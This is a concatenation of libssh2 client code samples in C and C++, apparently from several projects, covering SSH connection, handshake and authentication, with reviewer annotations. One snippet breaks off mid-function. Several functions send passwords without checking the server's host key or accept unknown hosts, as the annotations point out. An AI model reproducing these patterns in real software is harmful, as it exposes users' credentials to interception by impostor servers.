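/**
 * Connect to the SSH server at pIp (port 22), run the handshake, check the
 * server's host key against the local "known_hosts" file and authenticate.
 *
 * Authentication uses pPassword when it is non-empty; otherwise the key pair
 * under /home/user/.ssh is used with pPassword as the passphrase.
 *
 * @param pSsh       connection state to fill in (sock_fd, sin, session, nh)
 * @param pIp        dotted-quad IPv4 address of the server
 * @param pUsername  account name to authenticate as
 * @param pPassword  password, or "" to select public-key authentication
 *
 * @return 0 on success. Non-zero on failure: 1 libssh2 initialisation,
 *         2 known-hosts allocation, 3 no host key available, 4 host key
 *         differs from the known_hosts entry, -1 for bad arguments, socket,
 *         connect, session, handshake or authentication errors.
 *
 * On failure the socket and any session already stored in pSsh are left in
 * place for the caller to release.
 */
int ssh_init(SSH * pSsh, char * pIp,char * pUsername, char * pPassword)
{
    int ret;
    int type;
    const char * fingerprint;
    size_t len;

    /* 0 means success here, so bad arguments must not return 0. */
    if (NULL==pSsh || NULL==pIp || NULL==pUsername || NULL==pPassword)
    {
        return -1;
    }

    ret = libssh2_init (0);
    if (ret != 0)
    {
        fprintf (stderr, "libssh2 initialization failed (%d)\n", ret);
        return 1;
    }

    pSsh->sin.sin_family = AF_INET;
    pSsh->sin.sin_port = htons(22);
    pSsh->sin.sin_addr.s_addr = inet_addr(pIp);
    if (pSsh->sin.sin_addr.s_addr == INADDR_NONE)
    {
        fprintf(stderr, "failed to connect!\n");
        return -1;
    }

    pSsh->sock_fd=socket(AF_INET, SOCK_STREAM, 0);
    if (pSsh->sock_fd == -1)
    {
        fprintf(stderr, "failed to connect!\n");
        return -1;
    }

    if (connect(pSsh->sock_fd, (struct sockaddr*)(&pSsh->sin),
                sizeof(struct sockaddr_in)) != 0)
    {
        fprintf(stderr, "failed to connect!\n");
        return -1;
    }

    pSsh->session=libssh2_session_init();
    if (!pSsh->session)
    {
        return -1;
    }

    /* Non-blocking mode: every libssh2 call below is retried on EAGAIN. */
    libssh2_session_set_blocking(pSsh->session, 0);
    while ((ret = libssh2_session_handshake(pSsh->session, pSsh->sock_fd))
           == LIBSSH2_ERROR_EAGAIN);
    if (ret)
    {
        fprintf(stderr, "Failure establishing SSH session: %d\n", ret);
        return -1;
    }

    pSsh->nh = libssh2_knownhost_init(pSsh->session);
    if(!pSsh->nh)
    {
        return 2;
    }
    libssh2_knownhost_readfile(pSsh->nh, "known_hosts",
                               LIBSSH2_KNOWNHOST_FILE_OPENSSH);
    libssh2_knownhost_writefile(pSsh->nh, "dumpfile",
                                LIBSSH2_KNOWNHOST_FILE_OPENSSH);

    fingerprint = libssh2_session_hostkey(pSsh->session, &len, &type);
    if(!fingerprint)
    {
        libssh2_knownhost_free(pSsh->nh);
        pSsh->nh = NULL;
        return 3;
    }

    {
        struct libssh2_knownhost *host = NULL;
        int check = libssh2_knownhost_checkp(pSsh->nh, pIp, 22,
                                             fingerprint, len,
                                             LIBSSH2_KNOWNHOST_TYPE_PLAIN|
                                             LIBSSH2_KNOWNHOST_KEYENC_RAW,
                                             &host);

        fprintf(stderr, "Host check: %d, key: %s\n", check,
                (check <= LIBSSH2_KNOWNHOST_CHECK_MISMATCH && host)?
                host->key:"<none>");

        /* 'host' points into the collection, so free only after printing. */
        libssh2_knownhost_free(pSsh->nh);
        pSsh->nh = NULL;

        /* A key that differs from the recorded one is the signal of a
         * man-in-the-middle or a re-keyed server: never send credentials.
         * NOTE(review): a host missing from known_hosts is still accepted
         * here; decide whether unknown hosts should be rejected too. */
        if (check == LIBSSH2_KNOWNHOST_CHECK_MISMATCH)
        {
            fprintf(stderr, "Host key mismatch for %s, not authenticating.\n",
                    pIp);
            return 4;
        }
    }

    if ( strlen(pPassword) != 0 )
    {
        /* We could authenticate via password */
        while ((ret = libssh2_userauth_password(pSsh->session, pUsername,
                                                pPassword))
               == LIBSSH2_ERROR_EAGAIN);
        if (ret)
        {
            fprintf(stderr, "Authentication by password failed.\n");
            return -1;
        }
    }
    else
    {
        /* Or by public key */
        while ((ret = libssh2_userauth_publickey_fromfile(pSsh->session,
                                                          pUsername,
                                                          "/home/user/"
                                                          ".ssh/id_rsa.pub",
                                                          "/home/user/"
                                                          ".ssh/id_rsa",
                                                          pPassword))
               == LIBSSH2_ERROR_EAGAIN);
        if (ret)
        {
            fprintf(stderr, "\tAuthentication by public key failed\n");
            return -1;
        }
    }

    fprintf(stderr,"ssh_init\n");
    return 0;
}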
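/**
 * Example client: connect to an SSH server on port 22, check its host key
 * against "known_hosts", authenticate, run one command and echo the command
 * output to stderr.
 *
 * Arguments (all optional, in order): IPv4 address, user name, password,
 * command line. An empty password selects public-key authentication with the
 * key pair under /home/user/.ssh.
 *
 * NOTE(review): a password passed in argv is visible to other local users
 * through the process list; prefer a prompt or an agent outside of demos.
 *
 * @return 0 after the shutdown sequence has run (including after an
 *         authentication failure or a host key mismatch), non-zero for the
 *         early setup failures.
 */
int main(int argc, char *argv[])
{
    const char *hostname = "127.0.0.1";
    const char *commandline = "uptime";
    const char *username = "******";
    const char *password = "******";
    unsigned long hostaddr;
    int sock;
    struct sockaddr_in sin;
    const char *fingerprint;
    LIBSSH2_SESSION *session;
    LIBSSH2_CHANNEL *channel;
    int rc;
    int exitcode;
    char *exitsignal=(char *)"none";
    int bytecount = 0;
    size_t len;
    LIBSSH2_KNOWNHOSTS *nh;
    int type;

#ifdef WIN32
    WSADATA wsadata;
    int err;

    err = WSAStartup(MAKEWORD(2,0), &wsadata);
    if (err != 0) {
        fprintf(stderr, "WSAStartup failed with error: %d\n", err);
        return 1;
    }
#endif

    if (argc > 1)
        /* must be ip address only */
        hostname = argv[1];

    if (argc > 2) {
        username = argv[2];
    }
    if (argc > 3) {
        password = argv[3];
    }
    if (argc > 4) {
        commandline = argv[4];
    }

    rc = libssh2_init (0);
    if (rc != 0) {
        fprintf (stderr, "libssh2 initialization failed (%d)\n", rc);
        return 1;
    }

    hostaddr = inet_addr(hostname);

    /* Ultra basic "connect to port 22 on localhost"
     * Your code is responsible for creating the socket establishing the
     * connection
     */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        fprintf(stderr, "failed to connect!\n");
        return -1;
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(22);
    sin.sin_addr.s_addr = hostaddr;
    if (connect(sock, (struct sockaddr*)(&sin),
                sizeof(struct sockaddr_in)) != 0) {
        fprintf(stderr, "failed to connect!\n");
        return -1;
    }

    /* Create a session instance */
    session = libssh2_session_init();
    if (!session)
        return -1;

    /* tell libssh2 we want it all done non-blocking */
    libssh2_session_set_blocking(session, 0);

    /* ... start it up. This will trade welcome banners, exchange keys,
     * and setup crypto, compression, and MAC layers
     */
    while ((rc = libssh2_session_handshake(session, sock)) ==
           LIBSSH2_ERROR_EAGAIN);
    if (rc) {
        fprintf(stderr, "Failure establishing SSH session: %d\n", rc);
        return -1;
    }

    nh = libssh2_knownhost_init(session);
    if(!nh) {
        /* eeek, do cleanup here */
        return 2;
    }

    /* read all hosts from here */
    libssh2_knownhost_readfile(nh, "known_hosts",
                               LIBSSH2_KNOWNHOST_FILE_OPENSSH);

    /* store all known hosts to here */
    libssh2_knownhost_writefile(nh, "dumpfile",
                                LIBSSH2_KNOWNHOST_FILE_OPENSSH);

    fingerprint = libssh2_session_hostkey(session, &len, &type);
    if(fingerprint) {
        struct libssh2_knownhost *host;
#if LIBSSH2_VERSION_NUM >= 0x010206
        /* introduced in 1.2.6 */
        int check = libssh2_knownhost_checkp(nh, hostname, 22,
                                             fingerprint, len,
                                             LIBSSH2_KNOWNHOST_TYPE_PLAIN|
                                             LIBSSH2_KNOWNHOST_KEYENC_RAW,
                                             &host);
#else
        /* 1.2.5 or older */
        int check = libssh2_knownhost_check(nh, hostname,
                                            fingerprint, len,
                                            LIBSSH2_KNOWNHOST_TYPE_PLAIN|
                                            LIBSSH2_KNOWNHOST_KEYENC_RAW,
                                            &host);
#endif
        fprintf(stderr, "Host check: %d, key: %s\n", check,
                (check <= LIBSSH2_KNOWNHOST_CHECK_MISMATCH)?
                host->key:"<none>");

        /* A key that differs from the recorded one must stop the login
         * before any credential is sent.
         * NOTE(review): hosts absent from known_hosts are still accepted;
         * production code needs an explicit policy for that case. */
        if (check == LIBSSH2_KNOWNHOST_CHECK_MISMATCH) {
            fprintf(stderr, "Host key mismatch for %s, not authenticating.\n",
                    hostname);
            libssh2_knownhost_free(nh);
            goto shutdown;
        }
    }
    else {
        /* eeek, do cleanup here */
        return 3;
    }
    libssh2_knownhost_free(nh);

    if ( strlen(password) != 0 ) {
        /* We could authenticate via password */
        while ((rc = libssh2_userauth_password(session, username, password)) ==
               LIBSSH2_ERROR_EAGAIN);
        if (rc) {
            fprintf(stderr, "Authentication by password failed.\n");
            goto shutdown;
        }
    }
    else {
        /* Or by public key */
        while ((rc = libssh2_userauth_publickey_fromfile(session, username,
                                                         "/home/user/"
                                                         ".ssh/id_rsa.pub",
                                                         "/home/user/"
                                                         ".ssh/id_rsa",
                                                         password)) ==
               LIBSSH2_ERROR_EAGAIN);
        if (rc) {
            fprintf(stderr, "\tAuthentication by public key failed\n");
            goto shutdown;
        }
    }

#if 0
    libssh2_trace(session, ~0 );
#endif

    /* Exec non-blocking on the remote host */
    while( (channel = libssh2_channel_open_session(session)) == NULL &&
           libssh2_session_last_error(session,NULL,NULL,0) ==
           LIBSSH2_ERROR_EAGAIN )
    {
        waitsocket(sock, session);
    }
    if( channel == NULL )
    {
        fprintf(stderr,"Error\n");
        exit( 1 );
    }
    while( (rc = libssh2_channel_exec(channel, commandline)) ==
           LIBSSH2_ERROR_EAGAIN )
    {
        waitsocket(sock, session);
    }
    if( rc != 0 )
    {
        fprintf(stderr,"Error\n");
        exit( 1 );
    }
    for( ;; )
    {
        /* loop until we block */
        int rc;
        do
        {
            char buffer[0x4000];
            rc = libssh2_channel_read( channel, buffer, sizeof(buffer) );
            if( rc > 0 )
            {
                int i;
                bytecount += rc;
                fprintf(stderr, "We read:\n");
                for( i=0; i < rc; ++i )
                    fputc( buffer[i], stderr);
                fprintf(stderr, "\n");
            }
            else {
                if( rc != LIBSSH2_ERROR_EAGAIN )
                    /* no need to output this for the EAGAIN case */
                    fprintf(stderr, "libssh2_channel_read returned %d\n", rc);
            }
        }
        while( rc > 0 );

        /* this is due to blocking that would occur otherwise so we loop on
           this condition */
        if( rc == LIBSSH2_ERROR_EAGAIN )
        {
            waitsocket(sock, session);
        }
        else
            break;
    }
    exitcode = 127;
    while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN )
        waitsocket(sock, session);

    if( rc == 0 )
    {
        exitcode = libssh2_channel_get_exit_status( channel );
        libssh2_channel_get_exit_signal(channel, &exitsignal,
                                        NULL, NULL, NULL, NULL, NULL);
    }

    if (exitsignal)
        fprintf(stderr, "\nGot signal: %s\n", exitsignal);
    else
        fprintf(stderr, "\nEXIT: %d bytecount: %d\n", exitcode, bytecount);

    libssh2_channel_free(channel);
    channel = NULL;

shutdown:

    libssh2_session_disconnect(session,
                               "Normal Shutdown, Thank you for playing");
    libssh2_session_free(session);

#ifdef WIN32
    closesocket(sock);
#else
    close(sock);
#endif
    fprintf(stderr, "all done\n");

    libssh2_exit();

    return 0;
}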
// Resolve `hostname`:`port`, open a TCP connection to one of the resolved
// endpoints and run the libssh2 handshake on it in non-blocking mode.
// Failures are reported through MACE_SSH_THROW.
//
// The listing stops before the end of the try block and of the function, so
// the exception handler and anything after the handshake (host key check,
// authentication) are not visible here.
void client_d::connect() {
  try {
    if( libssh2_init(0) < 0 ) {
      MACE_SSH_THROW( "Unable to init libssh2" );
    }
    slog( "resolve %1%:%2%", hostname, port );
    std::vector<mace::cmt::asio::tcp::endpoint> eps = mace::cmt::asio::tcp::resolve( hostname, boost::lexical_cast<std::string>(port));
    slog( "resolved %1% options", eps.size() );
    if( eps.size() == 0 ) {
      MACE_SSH_THROW( "Hostname '%1%' didn't resolve to any endpoints", %hostname );
    }
    m_sock.reset( new boost::asio::ip::tcp::socket( mace::cmt::asio::default_io_service() ) );

    // Try each endpoint in turn and keep the first one that connects.
    // NOTE(review): every connect failure is swallowed and nothing after the
    // loop checks that an attempt succeeded, so the handshake below may run
    // on an unconnected socket. Confirm and fail explicitly if so.
    for( uint32_t i = 0; i < eps.size(); ++i ) {
      try {
        mace::cmt::asio::tcp::connect( *m_sock, eps[i] );
        endpt = eps[i];
        break;
      } catch ( ... ) {}
    }

    slog( "Creating session" );
    m_session = libssh2_session_init();
    // Store `this` as the session's abstract pointer.
    // NOTE(review): m_session is passed to libssh2_session_abstract before
    // the BOOST_ASSERT below checks it, and an assert is compiled out in
    // release builds; a failed init is not handled.
    *libssh2_session_abstract(m_session) = this;
    BOOST_ASSERT( m_session );

    // use non-blocking calls so that we know when to call wait_on_socket
    libssh2_session_set_blocking( m_session, 0 );

    // perform the session handshake, and keep trying while EAGAIN
    int ec = libssh2_session_handshake( m_session, m_sock->native() );
    while( ec == LIBSSH2_ERROR_EAGAIN ) {
      wait_on_socket();
      ec = libssh2_session_handshake( m_session, m_sock->native() );
    }

    // if there was an error, throw it.
    if( ec < 0 ) {
      char* msg;
      libssh2_session_last_error( m_session, &msg, 0, 0 );
      MACE_SSH_THROW( "Handshake error: %1% - %2%", %ec %msg );
    }
// Drive the SSH handshake on _socket_fd until it completes.
//
// While libssh2 reports EAGAIN the socket is waited on with
// timedwait_socket(); a failed wait is reported as an ETIMEDOUT syscall
// exception, and any other libssh2 error is reported with the session's own
// error message and code.
void CLibssh2::handshake()
{
    LIBSSH2_SESSION* ssh_session = static_cast<LIBSSH2_SESSION*>(_session);

    for (;;)
    {
        // SSH2 handshake step
        const int rc = libssh2_session_handshake(ssh_session, _socket_fd);

        if (rc == 0)
        {
            return;
        }

        if (rc == LIBSSH2_ERROR_EAGAIN)
        {
            // Not finished yet: wait for the socket, then try again.
            if (!timedwait_socket())
            {
                THROW_SYSCALL_EXCEPTION("handshake timeout", ETIMEDOUT, "poll");
            }
            continue;
        }

        THROW_EXCEPTION(get_session_errmsg(), get_session_errcode());
    }
}
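/**
 * Connect to serverAddress over SSH, authenticate with NETID/PWD and hand the
 * remote file serverFilePath to readFile() through an SFTP handle.
 *
 * Any failure of the handshake, the authentication or the remote open prints
 * the libssh2 error to stderr and terminates the process, matching the
 * "...OrDie" helpers used for the socket.
 *
 * NOTE(review): the server's host key is not verified, so the password is
 * sent to whatever answers on the socket. Compare libssh2_hostkey_hash()
 * (or a known_hosts lookup) against an expected value before authenticating.
 * NOTE(review): NETID and PWD look like compile-time credentials; confirm
 * they are not committed with the source.
 */
void getClient(char * serverAddress)
{
    int sockFd = makeSocketOrDie();
    struct addrinfo * serverInfo = getServerInfo(serverAddress);

    printf("Connecting to server\n");
    connectOrDie(sockFd, serverInfo);

    printf("Connected to server. Making LIBSSH2 session\n");
    LIBSSH2_SESSION * session = makeSession();
    libssh2_session_set_blocking(session, 1);
    libssh2_session_set_timeout(session, 5000);

    printf("Made session, handshaking\n");
    int result = libssh2_session_handshake(session, sockFd);
    //TODO: Match the host key fingerprint against something.
    if (result) {
        char * errorMessage;
        libssh2_session_last_error(session, &errorMessage, NULL, 0);
        fprintf(stderr, "Error %s handshaking\n", errorMessage);
        exit(EXIT_FAILURE);
    }

    printf("Handshake completed, making SFTP Session\n");
    /* The result used to be ignored, so a rejected login only surfaced later
     * as an unrelated SFTP failure. */
    if (libssh2_userauth_password(session, NETID, PWD)) {
        char * errorMessage;
        libssh2_session_last_error(session, &errorMessage, NULL, 0);
        fprintf(stderr, "Error %s authenticating\n", errorMessage);
        exit(EXIT_FAILURE);
    }

    LIBSSH2_SFTP * sftpSession = makeSFTPSession(session);

    printf("Started SFTP - Downloading file\n");
    LIBSSH2_SFTP_HANDLE * fileHandle =
        libssh2_sftp_open(sftpSession, serverFilePath, LIBSSH2_FXF_READ, 0);
    if (fileHandle == NULL) {
        char * errorMessage;
        libssh2_session_last_error(session, &errorMessage, NULL, 0);
        fprintf(stderr, "Error %s opening remote file\n", errorMessage);
        exit(EXIT_FAILURE);
    }

    readFile(session, sftpSession, fileHandle);

    libssh2_sftp_shutdown(sftpSession);
    libssh2_session_disconnect(session, "Done.\n");
    libssh2_session_free(session);
    freeaddrinfo(serverInfo);
    close(sockFd);
}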
/*
 * Create a libssh2 session and run the SSH handshake over the socket of the
 * given stream.
 *
 * The handshake is repeated for as long as libssh2 reports EAGAIN or TIMEOUT.
 * On success the session is switched to blocking mode and stored in *session.
 *
 * Returns 0 on success, -1 on failure (an error message is set and the
 * partially built session is freed).
 */
static int _git_ssh_session_create(
	LIBSSH2_SESSION** session,
	git_stream *io)
{
	git_socket_stream *sock_stream = (git_socket_stream *) io;
	LIBSSH2_SESSION *new_session;
	int status = 0;

	assert(session);

	new_session = libssh2_session_init();
	if (new_session == NULL) {
		giterr_set(GITERR_NET, "failed to initialize SSH session");
		return -1;
	}

	/* Retry until the handshake either completes or fails for real. */
	for (;;) {
		status = libssh2_session_handshake(new_session, sock_stream->s);
		if (status != LIBSSH2_ERROR_EAGAIN && status != LIBSSH2_ERROR_TIMEOUT)
			break;
	}

	if (status == LIBSSH2_ERROR_NONE) {
		libssh2_session_set_blocking(new_session, 1);
		*session = new_session;
		return 0;
	}

	ssh_error(new_session, "failed to start SSH session");
	libssh2_session_free(new_session);
	return -1;
}
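/**
 * Create a blocking libssh2 session on an already connected socket, run the
 * handshake and authenticate with a password.
 *
 * @param username  account to log in as
 * @param pass      password for that account
 * @param session   receives the new session; set to NULL when the session
 *                  was created and then released because of a failure
 * @param sock      connected socket
 *
 * @return 0 on success, -1 on any failure.
 *
 * The function used to fall off its end on success (no return value) and to
 * return 0 after a failed authentication, so a caller could not tell a
 * usable session from a freed one.
 *
 * An authentication failure also closes sock and calls libssh2_exit(), as
 * before; a handshake failure leaves the socket open for the caller.
 *
 * NOTE(review): no host key check happens before the password is sent.
 */
int logon(char* username, char* pass, LIBSSH2_SESSION **session, int sock)
{
    int rc;

    /* Create a session instance */
    if((*session = libssh2_session_init()) == NULL)
        return -1;

    /* Blocking mode, so the calls below need no EAGAIN retry loop. */
    libssh2_session_set_blocking(*session, 1);

    rc = libssh2_session_handshake(*session, sock);
    if(rc) {
        fprintf(stderr, "Failure establishing SSH session: %d %s\n", rc, strerror(errno));
        libssh2_session_free(*session);
        *session = NULL;
        return -1;
    }

    rc = libssh2_userauth_password(*session, username, pass);
    if (rc) {
        fprintf(stderr, "Authentication by password failed.\n");
        libssh2_session_disconnect(*session, "");
        libssh2_session_free(*session);
        /* Do not leave the caller holding a freed session. */
        *session = NULL;
        close(sock);
        libssh2_exit();
        return -1;
    }

    return 0;
}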
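// Start an SSH session on the already connected _socket, authenticate with
// the credentials in `settings` and open an interactive shell channel with a
// "vanilla" pty.
//
// A key pair is used when both key file paths are set; otherwise password
// authentication is used, provided the server advertises it.
//
// Throws cql_ccm_bridge_exception_t on any failure. The session is closed
// through close_ssh_session() before the exception leaves this function.
//
// NOTE(review): the server's host key is never checked, so credentials are
// offered to an unverified peer.
void cql_ccm_bridge_t::start_ssh_connection(const cql_ccm_bridge_configuration_t& settings)
{
    _ssh_internals->_session = libssh2_session_init();
    if (!_ssh_internals->_session)
        throw cql_ccm_bridge_exception_t("cannot create ssh session");

    try {
        if (libssh2_session_handshake(_ssh_internals->_session, _socket))
            throw cql_ccm_bridge_exception_t("ssh session handshake failed");

        // get authentication modes supported by server
        char* auth_methods = libssh2_userauth_list(_ssh_internals->_session,
                                                   settings.ssh_username().c_str(),
                                                   settings.ssh_username().size());

        int auth_result;
        if (!settings.ssh_public_key_file().empty() && !settings.ssh_private_key_file().empty()) {
            auth_result = libssh2_userauth_publickey_fromfile(_ssh_internals->_session,
                                                              settings.ssh_username().c_str(),
                                                              settings.ssh_public_key_file().c_str(),
                                                              settings.ssh_private_key_file().c_str(),
                                                              "");
        } else {
            // libssh2_userauth_list returns NULL when it fails, and strstr
            // on a null pointer is undefined behaviour.
            if (auth_methods == NULL || strstr(auth_methods, "password") == NULL)
                throw cql_ccm_bridge_exception_t("server doesn't support authentication by password");

            // try to login using username and password
            auth_result = libssh2_userauth_password(_ssh_internals->_session,
                                                    settings.ssh_username().c_str(),
                                                    settings.ssh_password().c_str());
        }

        if (auth_result != 0)
            throw cql_ccm_bridge_exception_t("invalid password or user");

        if (!(_ssh_internals->_channel = libssh2_channel_open_session(_ssh_internals->_session)))
            throw cql_ccm_bridge_exception_t("cannot open ssh session");

        try {
            if (libssh2_channel_request_pty(_ssh_internals->_channel, "vanilla"))
                throw cql_ccm_bridge_exception_t("pty requests failed");

            if (libssh2_channel_shell(_ssh_internals->_channel))
                throw cql_ccm_bridge_exception_t("cannot open shell");

            //TODO: Copy SSL files to remote connection for CCM to enable SSL with Cassandra instances (or use keytool to simply generate the files remotely)
        }
        catch (cql_ccm_bridge_exception_t&) {
            // calls channel_close
            libssh2_channel_free(_ssh_internals->_channel);
            // The handler used to swallow the error and leave the freed
            // channel pointer in place; clear it and report the failure.
            _ssh_internals->_channel = NULL;
            throw;
        }
    }
    catch (cql_ccm_bridge_exception_t&) {
        close_ssh_session();
        throw;
    }
}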
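/**
 * Open a TCP connection to port 22 on params->hostname (a dotted-quad IPv4
 * address) and run the SSH handshake in non-blocking mode.
 *
 * @param params  connection parameters; only hostname is read here
 * @return a newly allocated connection holding the socket and the session,
 *         or NULL on failure. The caller owns the returned object.
 *
 * Authentication and host key verification are not done here; the caller
 * must verify the host key before sending credentials.
 */
ssh_conn_t *ssh_connect(param_t *params)
{
    int rc;
    struct sockaddr_in sin;
    unsigned long hostaddr;
    ssh_conn_t *pcon;

    rc = libssh2_init (0);
    if (rc != 0) {
        fprintf (stderr, "libssh2 initialization failed (%d)\n", rc);
        return NULL;
    }

    /* Allocate only after library init so that path has nothing to free. */
    pcon = (ssh_conn_t*)malloc(sizeof(ssh_conn_t));
    if (!pcon) {
        fprintf(stderr, "failed to connect!\n");
        return NULL;
    }
    pcon->session = NULL;

    /* Ultra basic "connect to port 22 on localhost"
     * Your code is responsible for creating the socket establishing the
     * connection
     */
    hostaddr = inet_addr(params->hostname);

    pcon->sock = socket(AF_INET, SOCK_STREAM, 0);
    if (pcon->sock == -1) {
        fprintf(stderr, "failed to connect!\n");
        goto fail;
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(22);
    sin.sin_addr.s_addr = hostaddr;
    if (connect(pcon->sock, (struct sockaddr*)(&sin),
                sizeof(struct sockaddr_in)) != 0) {
        fprintf(stderr, "failed to connect!\n");
        goto fail;
    }

    /* Create a session instance */
    pcon->session = libssh2_session_init();
    if (!pcon->session)
        goto fail;

    /* tell libssh2 we want it all done non-blocking */
    libssh2_session_set_blocking(pcon->session, 0);

    /* ... start it up. This will trade welcome banners, exchange keys,
     * and setup crypto, compression, and MAC layers
     */
    while ((rc = libssh2_session_handshake(pcon->session, pcon->sock)) ==
           LIBSSH2_ERROR_EAGAIN);
    if (rc) {
        fprintf(stderr, "Failure establishing SSH session: %d\n", rc);
        goto fail;
    }

    return pcon;

fail:
    /* Release what was built so far; the failure paths used to leak all of
     * it.
     * NOTE(review): the socket itself is still not closed here, because no
     * close()/closesocket() call is visible in this listing; add the
     * platform's close once the right header is confirmed. */
    if (pcon->session)
        libssh2_session_free(pcon->session);
    free(pcon);
    return NULL;
}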
/*
 * Open a socket to the OpenSSH server and run the SSH handshake of
 * connected_session on it.
 *
 * Returns 0 when the handshake succeeds, -1 when the socket could not be
 * opened or the handshake failed (the session error is printed in the
 * latter case).
 */
static int connect_to_server()
{
    connected_socket = open_socket_to_openssh_server();

    if(connected_socket > 0) {
        const int handshake_rc =
            libssh2_session_handshake(connected_session, connected_socket);

        if(handshake_rc == 0) {
            return 0;
        }
        print_last_session_error("libssh2_session_handshake");
    }

    return -1;
}
// Run one step of the SSH handshake on the session's socket.
//
// Returns utils::TASK_WORKING while libssh2 reports EAGAIN (call again
// later) and utils::TASK_DONE once the handshake has completed. Any other
// libssh2 result is thrown as SSHHandshakeError carrying the error code.
utils::TaskState RemoteSessionHandle::DoHandshake()
{
    const int status = libssh2_session_handshake(sessionHandle.GetSession(), sock->native_handle());

    if (status == LIBSSH2_ERROR_EAGAIN)
    {
        return utils::TASK_WORKING;
    }

    if (status != 0)
    {
        const string detail = "RemoteSessionHandle: Error " + lexical_cast<string>(status) + " during SSH handshake";
        BOOST_THROW_EXCEPTION(SSHHandshakeError{} << ssh_error_string{detail} << ssh_error_id{status});
    }

    return utils::TASK_DONE;
}
/*
 * Handshake step of the client session state machine.
 *
 * Returns without changing anything while libssh2 reports EAGAIN. When the
 * handshake fails, or the host key does not validate, the libssh2 session
 * and the client session are torn down. Otherwise the authentication
 * callback becomes the current step and is invoked immediately.
 */
static void
ssh_handshake_cb(obfsproxyssh_client_session_t *session)
{
	evutil_socket_t sock = bufferevent_getfd(session->ssh_ev);
	int status = libssh2_session_handshake(session->ssh_session, sock);
	int peer_accepted;

	if (status == LIBSSH2_ERROR_EAGAIN)
		return;

	/* The host key is only validated once the handshake itself succeeded. */
	peer_accepted = (status == 0) && (ssh_validate_hostkey(session) == 0);
	if (!peer_accepted) {
		libssh2_session_free(session->ssh_session);
		session->ssh_session = NULL;
		session_free(session);
		return;
	}

	session->libssh2_cb = ssh_auth_cb;
	session->libssh2_cb(session);
}
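/**
 * Connect to the SSH server named in the client's data, run the handshake
 * and authenticate, with the private key if one is configured and with the
 * password otherwise.
 *
 * @param client     the guac_client whose data holds hostname, port,
 *                   username, key and password
 * @param socket_fd  if non-NULL, receives the connected socket descriptor
 *                   once the handshake has succeeded
 *
 * @return the authenticated session, or NULL on failure (the client is
 *         aborted with a matching status and the session is freed).
 *
 * NOTE(review): the server's host key is never verified, so credentials are
 * offered to an unauthenticated peer.
 * NOTE(review): the socket is created as AF_INET while getaddrinfo() is
 * asked for AF_UNSPEC, so IPv6 results cannot be connected to; the
 * descriptor is also left open on the failure paths because no close() call
 * is visible in this listing.
 */
static LIBSSH2_SESSION* __guac_ssh_create_session(guac_client* client,
        int* socket_fd) {

    int retval;

    int fd;
    struct addrinfo* addresses;
    struct addrinfo* current_address;

    char connected_address[1024];
    char connected_port[64];

    ssh_guac_client_data* client_data = (ssh_guac_client_data*) client->data;

    struct addrinfo hints = {
        .ai_family   = AF_UNSPEC,
        .ai_socktype = SOCK_STREAM,
        .ai_protocol = IPPROTO_TCP
    };

    /* Get socket */
    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) {
        guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR,
                "Unable to create socket: %s", strerror(errno));
        return NULL;
    }

    /* Get addresses connection */
    if ((retval = getaddrinfo(client_data->hostname, client_data->port,
                    &hints, &addresses))) {
        guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR,
                "Error parsing given address or port: %s",
                gai_strerror(retval));
        return NULL;
    }

    /* Attempt connection to each address until success */
    current_address = addresses;
    while (current_address != NULL) {

        /* The buffers are logged below even when getnameinfo() fails, so
         * make sure they always hold a valid string. */
        connected_address[0] = '\0';
        connected_port[0] = '\0';

        /* Resolve hostname */
        if ((retval = getnameinfo(current_address->ai_addr,
                current_address->ai_addrlen,
                connected_address, sizeof(connected_address),
                connected_port, sizeof(connected_port),
                NI_NUMERICHOST | NI_NUMERICSERV)))
            guac_client_log_info(client, "Unable to resolve host: %s",
                    gai_strerror(retval));

        /* Connect */
        if (connect(fd, current_address->ai_addr,
                        current_address->ai_addrlen) == 0) {

            guac_client_log_info(client, "Successfully connected to "
                    "host %s, port %s", connected_address, connected_port);

            /* Done if successful connect */
            break;

        }

        /* Otherwise log information regarding bind failure */
        else
            guac_client_log_info(client, "Unable to connect to "
                    "host %s, port %s: %s",
                    connected_address, connected_port, strerror(errno));

        current_address = current_address->ai_next;

    }

    /* If unable to connect to anything, fail */
    if (current_address == NULL) {
        /* The address list used to leak on this path. */
        freeaddrinfo(addresses);
        guac_client_abort(client, GUAC_PROTOCOL_STATUS_UPSTREAM_ERROR,
                "Unable to connect to any addresses.");
        return NULL;
    }

    /* Free addrinfo */
    freeaddrinfo(addresses);

    /* Open SSH session */
    LIBSSH2_SESSION* session = libssh2_session_init_ex(NULL, NULL,
            NULL, client);
    if (session == NULL) {
        guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR,
                "Session allocation failed.");
        return NULL;
    }

    /* Perform handshake */
    if (libssh2_session_handshake(session, fd)) {
        guac_client_abort(client, GUAC_PROTOCOL_STATUS_UPSTREAM_ERROR,
                "SSH handshake failed.");
        libssh2_session_free(session);
        return NULL;
    }

    /* Save file descriptor */
    if (socket_fd != NULL)
        *socket_fd = fd;

    /* Authenticate with key if available */
    if (client_data->key != NULL) {
        if (!libssh2_userauth_publickey(session, client_data->username,
                    (unsigned char*) client_data->key->public_key,
                    client_data->key->public_key_length,
                    __sign_callback, (void**) client_data->key))
            return session;
        else {
            char* error_message;
            libssh2_session_last_error(session, &error_message, NULL, 0);
            guac_client_abort(client,
                    GUAC_PROTOCOL_STATUS_CLIENT_UNAUTHORIZED,
                    "Public key authentication failed: %s", error_message);
            /* error_message belongs to the session: free only afterwards. */
            libssh2_session_free(session);
            return NULL;
        }
    }

    /* Authenticate with password */
    if (!libssh2_userauth_password(session, client_data->username,
                client_data->password))
        return session;

    else {
        char* error_message;
        libssh2_session_last_error(session, &error_message, NULL, 0);
        guac_client_abort(client,
                GUAC_PROTOCOL_STATUS_CLIENT_UNAUTHORIZED,
                "Password authentication failed: %s", error_message);
        /* error_message belongs to the session: free only afterwards. */
        libssh2_session_free(session);
        return NULL;
    }

}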
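/*
 * Connect to the SSH server described by 'options', verify its host key,
 * authenticate, start SFTP and open the remote file.
 *
 * Options read: "host" (required), "port" (default 22), "path" (required),
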